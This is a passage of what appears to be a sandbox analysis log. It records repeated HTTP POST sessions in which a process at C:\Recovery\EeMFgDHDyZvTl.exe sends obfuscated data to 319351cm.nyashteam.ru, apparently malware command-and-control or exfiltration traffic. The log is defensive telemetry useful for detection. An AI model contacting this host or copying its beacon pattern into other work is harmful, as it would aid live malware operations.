cfL4;desc="?proto=TCP&rtt=3623&min_rtt=1869&rtt_var=4210&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=91777&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	49968	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:32.876612902 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:13:33.233144999 CET	1008	OUT	Data Raw: 56 50 5f 5a 59 5f 53 5c 5c 56 52 5a 50 5a 5a 50 58 5b 5b 5c 50 5c 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_ZY_S\\VRZPZZPX[[\P\VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>.>W(S(&;)T$?#']1=. #<>&) 5R8=']/!Q!0
Dec 6, 2024 03:13:33.961354971 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:34.208884001 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XkxeZnC91xVtuMXWUzeGcbgcpHV6%2FoI8UhwqPq8bhcf0sKi6F0I40y7SM6PmbGJSw1uRpFZ7F7J839G7hHVJKBSK4tiTaBP4Uq0rw8INx8hMlKT6ateLKj93JIyOqrYcr5%2BMc0EuIk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1e64dca8c1d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3158&min_rtt=1973&rtt_var=3111&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=127421&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	49971	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:34.442908049 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:34.795597076 CET	1012	OUT	Data Raw: 53 53 5a 5d 59 50 56 52 5c 56 52 5a 50 5f 5a 53 58 5e 5b 59 50 5e 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZ]YPVR\VRZP_ZSX^[YP^V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@* >T?W<&<2+%R&,0;>_> 1S2#]!;T.-']/!Q!4
Dec 6, 2024 03:13:35.528739929 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:35.798047066 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUoMYFWzjzLI9dXpGA6SVI5o3av7ebJMGHAmwre7D5xZkftR310x6uK9DVDTOuie7v1Eci1yuDG6M0x2pLMVSkidLir5pQaVGJ14ht7McyFNj%2FyqnJyoXJIfrwMNuohgVFQo33wdkpY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1f018ff41d8-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4299&min_rtt=1774&rtt_var=5715&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=66442&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49975	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:36.039033890 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:36.389338970 CET	1012	OUT	Data Raw: 53 56 5f 5c 59 5c 56 5d 5c 56 52 5a 50 5f 5a 5c 58 5d 5b 56 50 5b 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_\Y\V]\VRZP_Z\X][VP[V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>0Z)1'T<;^%+:$<R'+2>+Z ?W&:5 /-']/!Q!4
Dec 6, 2024 03:13:37.127295971 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:37.383707047 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebTqCX80hL7O%2FvDYIS9gJURj8Sw3jmfqYBZwTiazvfBbRNBiuVa9kIehUBF9%2FN3aQYhFfUpqKnRj7fZg%2FWilatljwrpSckNlrGFow241JCrR6xRDsqK9QMfy7Y1ndt6tiaigRLugV%2F8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1fa1fbe429d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5337&min_rtt=3649&rtt_var=4744&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=85111&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49982	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:37.637947083 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:37.983212948 CET	1012	OUT	Data Raw: 53 51 5f 5d 59 58 56 5b 5c 56 52 5a 50 5f 5a 56 58 59 5b 5e 50 5d 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_]YXV[\VRZP_ZVXY[^P]VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@*V>?18<4%+!T$,<$(-(7%9#638=']/!Q!4
Dec 6, 2024 03:13:38.733068943 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:39.026693106 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JrHuC%2F75QuRWa8PRC%2FbxRiT%2Bobxk6Pq%2F9Q3QDtkYpaMuIynL%2BS%2BFqwZBlzbDYiBF5wWfrwuXeCjugA7yoDrB47xcaJZ4Pd7XKGeJQbS%2BKAXFTpXTc5Y0TTgYZpZcksEKBMiydnlS%2ByY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2041bbfc3f3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4165&min_rtt=1640&rtt_var=5665&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=66843&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	49987	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:39.273261070 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:39.623833895 CET	1012	OUT	Data Raw: 53 56 5f 59 5c 5c 56 59 5c 56 52 5a 50 5f 5a 56 58 53 5b 59 50 5a 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_Y\\VY\VRZP_ZVXS[YPZV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"3=;R<^1;5V%/7$+)=4#/)':;_64;-']/!Q!4
Dec 6, 2024 03:13:40.357671022 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:40.644319057 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ovt1t32lpViIRKBXspU95GHQU893kLFWO5OAAfJwEg1qY4gq2ohc%2BiUxmq%2BUGk%2F1HgJniWXBoMaqiZyHO7JPsHaltOyw%2FrbT0aTQfAWXGs30pn2zUWVS3tbyybFHkJ3fonkMJjPtyWw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c20e49024264-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4135&min_rtt=1695&rtt_var=5517&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=68799&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	49991	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:40.880398989 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:41.233117104 CET	1012	OUT	Data Raw: 53 56 5f 59 59 58 56 5e 5c 56 52 5a 50 5e 5a 54 58 52 5b 5f 50 5d 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_YYXV^\VRZP^ZTXR[_P]V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!) =1$+5?^';S2?V0:Y)./Y!?5S&)?]!^</-']/!Q!0
Dec 6, 2024 03:13:42.003324032 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:42.291090012 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5T9%2B9TQIyrZyfJQh66V3sgQhuQwOWLZjMacPVR7yxsZTglb92RZzTnEmwJ6W4tFczTfTDLKnvpME65c1zgw2u6M0CWQ3zD3Q85AVZimhO18Y1ux0bIg5VbO9A8QwTin8zoKxm6VrwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2186b3342b8-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5885&min_rtt=1711&rtt_var=8990&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=41590&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	49995	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:42.537362099 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	49997	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:42.765445948 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:43.123959064 CET	1296	OUT	Data Raw: 53 52 5f 58 5c 58 53 5e 5c 56 52 5a 50 53 5a 53 58 5c 5b 5b 50 5e 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_X\XS^\VRZPSZSX\[[P^V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)-?"+S?Z%(1W%,?'+&=- 7.&)']"(0.=']/!Q!
Dec 6, 2024 03:13:43.871056080 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:44.151262999 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txsH3k6jfKky3%2BgXWF7gwGFaokOxcqApP5trtmR4wB4KUkndcqu81QojmljBS%2Fvrb76DFcOwEnzblrAuG1mVAtA7J6WLb64%2BIl66GuOQ%2BrBxVPHTNkWCoMICjuy8Xk9%2B0G9tzGePmWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c22438bac472-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4390&min_rtt=1660&rtt_var=6083&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=62114&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 01 27 5b 37 03 36 0c 34 59 39 2e 20 50 25 07 31 19 2d 2b 34 1b 22 28 3a 05 29 3f 2c 57 25 34 3b 5f 3e 12 25 59 3e 3f 0a 0e 29 38 23 5b 00 13 25 07 29 13 32 56 28 29 0e 16 26 0d 0c 5f 3d 08 2e 5b 29 07 23 52 21 2a 22 01 22 13 0a 1b 27 13 06 0f 2f 36 20 16 29 37 2e 51 31 34 21 5e 0e 11 39 1c 25 33 31 02 37 01 27 1f 31 56 20 12 3f 07 28 13 27 06 33 1c 2b 24 0d 0b 24 57 35 1e 33 3f 3c 11 32 04 21 06 20 01 20 0f 2c 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&'[764Y9. P%1-+4"(:)?,W%4;_>%Y>?)8#[%)2V()&_=.[)#R!*""'/6 )7.Q14!^9%317'1V ?('3+$$W53?<2! ,<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	49999	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:42.882006884 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:43.233275890 CET	1008	OUT	Data Raw: 56 55 5f 59 5c 5b 56 5e 5c 56 52 5a 50 5a 5a 56 58 53 5b 58 50 5e 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU_Y\[V^\VRZPZZVXS[XP^VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C>0-]>8+\'(-T28':=.3#?=R2:Y578']/!Q!(
Dec 6, 2024 03:13:43.966465950 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:44.238538027 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0ln7kmFAwH%2B01MUoMDXnIPjTx8%2F4CrdEA3m0tt%2Bi84l%2Fn%2BOUtUsuIKHvvj49QNKWUMITJ3Q1%2Bw72SekNVw14HH7Sl75IcJWWVQ1WpxPa3TJPmBvcJhNXcmT%2BK3DL4mbOhCNUUPos%2BQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c224dff34308-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4150&min_rtt=1659&rtt_var=5604&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=67627&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	50003	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:44.475464106 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:13:44.826829910 CET	1008	OUT	Data Raw: 53 56 5a 5b 59 5a 56 59 5c 56 52 5a 50 5a 5a 50 58 5a 5b 58 50 5d 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SVZ[YZVY\VRZPZZPXZ[XP]V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>V9\>!8?,%+*$/?T0(9(.(#!W1:#X5;<8']/!Q!0
Dec 6, 2024 03:13:45.569078922 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:45.808435917 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chdiKuXg%2FR%2FhpBnwBGKp21WfnmGSM4jheBccwIqn2SXkcUZCDrw%2BTWOSxADMDFDEtjYpIMxTlQoWx1uyR%2BOCevcllM154DZZDFqIEIFBnCYniuz4NU3%2FFSEIlDqasNPKBAMbtCALCT0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c22edc214273-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3469&min_rtt=1697&rtt_var=4181&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=91956&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	50009	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:46.052083015 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:46.407844067 CET	1008	OUT	Data Raw: 53 52 5f 59 59 58 53 5e 5c 56 52 5a 50 5a 5a 55 58 52 5b 56 50 5e 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_YYXS^\VRZPZZUXR[VP^V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>1><+28)243:[.< 2)3X68$;=']/!Q!$
Dec 6, 2024 03:13:47.141649961 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:47.408797026 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2bLBdMQaDQHMJEB7lwkubNeozNVrbJxcS3elei1eoYpq5TsQSiThtuYfimLWm%2BcAMVSpco0vgDQpj%2FJS3hBp4AH4fh01LgswfJ0rpYZ3cbS2I8M69Dst1FwqMJbfHNqjds%2BjzA6mQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c238afe5c448-EWR alt-svc: h2=":443"; ma=60 server-timing: 